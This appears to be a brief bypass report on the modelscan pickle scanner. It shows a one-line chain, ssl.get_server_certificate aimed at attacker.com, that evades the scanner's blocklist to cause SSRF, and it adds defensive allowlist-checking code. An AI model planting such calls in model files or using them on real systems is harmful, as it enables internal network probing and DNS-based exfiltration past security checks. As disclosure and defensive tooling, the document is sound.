Modelscan Bypass: ssl.get_server_certificate SSRF
Summary
Bypasses modelscan 0.7.6 while making TLS connections to arbitrary servers (SSRF).
Chain
ssl.get_server_certificate(("attacker.com", 443)) - DNS resolution + TCP + TLS handshake to attacker-controlled server.
Why It Works
- ssl module NOT in modelscan blocklist
- Only httplib (Python 2) is blocked, not ssl
- Single function call, no chaining needed
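A defender-side check for the blocklist gap described above, added here as an example (it is not modelscan's code or the author's): rather than extending a denylist, it lists the globals a pickle would import and reports any outside an allowlist. It assumes the model file is a pickle; `ALLOWED_MODULES`, `imported_globals` and `violations` are hypothetical names, and the sample pickles are constructed.

```python
import pickle
import pickletools
import ssl

# Assumption: modules this deployment's model pickles legitimately import.
ALLOWED_MODULES = {"collections", "numpy", "torch"}

def imported_globals(data: bytes):
    """List (module, name) pairs a pickle would import, without loading it.
    Static approximation: tracks string pushes and the memo, not the full stack."""
    found, recent, memo = [], [], {}
    prev = None  # string pushed by the previous opcode, if any
    for op, arg, _pos in pickletools.genops(data):
        pushed = None
        if op.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            # Operands are the two strings pushed (or fetched from memo) before it.
            pair = recent[-2:]
            ok = len(pair) == 2 and all(isinstance(s, str) for s in pair)
            found.append(tuple(pair) if ok else ("?", "?"))  # unresolved: fail closed
        elif op.name == "MEMOIZE":
            memo[len(memo)] = prev
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = prev
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            pushed = memo.get(arg)
            recent.append(pushed)
        elif isinstance(arg, str):
            pushed = arg
            recent.append(pushed)
        prev = pushed
    return found

def violations(data: bytes):
    """Globals whose top-level module is not on the allowlist."""
    return [(m, n) for m, n in imported_globals(data)
            if m.split(".")[0] not in ALLOWED_MODULES]

# Constructed samples: a pickle that only references the function named on this
# page (loading it calls nothing) and a plain-data pickle.
REFERENCE_ONLY = pickle.dumps(ssl.get_server_certificate, protocol=4)
PLAIN_DATA = pickle.dumps({"weights": [0.1, 0.2]}, protocol=4)

if __name__ == "__main__":
    print(violations(REFERENCE_ONLY))
    print(violations(PLAIN_DATA))
```

Because the decision is an allowlist, a module that a denylist never anticipated is reported by default instead of passing silently.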
Impact
SSRF via TLS - DNS resolution, TCP connection, TLS handshake to attacker. Can probe internal network services, trigger DNS callbacks for data exfiltration.
Modelscan Result
No issues found!